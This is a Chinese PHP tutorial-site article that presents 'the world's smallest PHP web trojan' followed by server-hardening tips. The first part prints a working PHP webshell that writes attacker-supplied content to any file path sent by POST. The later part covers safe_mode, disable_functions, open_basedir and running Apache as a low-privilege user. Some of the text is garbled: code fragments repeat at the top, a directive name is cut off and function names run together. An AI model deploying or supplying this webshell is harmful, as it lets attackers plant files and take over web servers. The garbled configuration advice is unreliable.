$v) $_POST[$k] = stripslashes($v); ?>
儲存文"/> $v) $_POST[$k] = stripslashes($v); ?> 儲存文">

首頁  >  文章  >  後端開發  >  全世界最小的php網頁木馬一枚 附PHP木馬的防範方法

全世界最小的php網頁木馬一枚 附PHP木馬的防範方法

WBOY
WBOY原創
2016-07-29 08:40:541132瀏覽

php網頁木馬

複製程式碼 程式碼如下:


header("content-Type: text/ html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>


儲存檔名:









if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '儲存成功!' : '儲存失敗!';
@fclose($fp);
}
?>

一句話php木馬

複製程式碼

複製程式碼

程式碼如下:






PHP木馬的防範方法


PHP木馬的防範方法
PHP是能讓你產生動態網頁的工具之一。 PHP網頁檔案被當作一般HTML網頁檔案來處理並且在編輯時你可以用編輯HTML的常規方法來寫PHP。
PHP代表,超文本預處理器(PHP: Hypertext Preprocessor),可以從PHP官方網站(http://www.php.net)自由下載。 PHP遵守GNU公共許可(GPL),在這項許可下誕生了許多流行的軟體諸如Linux和Emacs。 PHP在大多數Unix平台,GUN/Linux和微軟Windows平台上都可以運作。怎樣在Windows環境的PC機器或Unix機器上安裝PHP的資料可以在PHP官方網站上找到。安裝過程很簡單。
PHP的另一個好處就在於他的安全性,隨著現在互聯網的發展,網絡安全越來越受重視,PHP的誕生幾乎代替了ASP,因為PHP對於安全方面的設置是極為簡單的不像ASP一樣需要很多的步驟,和禁用很多的服務。不過再好的東西也總是會有不足,如果預設的PHP同意也是不堪一擊,因此本文就來講一下如何對PHP進行一些安全方面的配置,來防止腳本木馬的破壞。
一、防止php木馬執行webshel​​l
開啟safe_mode, 在,php.ini中設定 disable_functi 二者選一即可,也可都選。
二、防止跳出web目錄
先修改httpd.conf,如果你只允許你的php腳本程式在web目錄裡操作,還可以修改httpd.conf檔限制php的操作路徑。例如你的web目錄是/usr/local/apache/htdocs,那麼在httpd.conf加上這麼幾行: php_admin_value open_basedir /usr/local/apache/htdocs ,如果腳本要讀/usr/local/apache/htdocs以外的檔案將不會被允許,如果錯誤顯示開啟的話會提示這樣的錯誤: Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。
三、防止php木馬讀寫檔目錄
在php.ini的disable_functi 後面加上php處理檔的函數,主要有fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose ,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile 。即成為 disable_functi,fopen,mkdir,rmdir,chmod,unlink,dir ,fopen,fread,fclose,fwrite,file_exists ,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile,。

ok,大功告成,php木馬拿我們沒轍了,遺憾的是這樣的話,利用文字資料庫的那些東西就都不能用了。 如果是在windos平台下搭建的apache還需要注意一點,apache預設運行是system權限,必須給apache降降權限,如下:

net user apache f**kmicrosoft /add

net localgroup users apache / del

此時建立了一個不屬於任何群組的使用者apche,只要開啟電腦管理員-服務-apache服務的屬性-log on-this account,在這裡填入上面所建立的帳戶和密碼,重啟apache服務即可實現apache運作在低權限下。 總結:實際上還可以透過設定各個資料夾的權限,為每個目錄建立一個單獨能讀寫的用戶,來實現安全。目前許多虛擬主機供應商的流行配置方法,不過這種方法用來防止這裡就顯的有點大材小用了。只要我們管理員有安全意識,相對的禁閉不用的功能就可以確保網路安全的威脅。 下面是mcafee的安全設置,防止一些網頁木馬產生文件等。 http://www.jb51.net/hack/list461_1.html 以上就介紹了 全世界最小的php網頁木馬一枚 附PHP木馬的防範方法,包括了方面的內容,希望對PHP教程有興趣的朋友有所幫助。
陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn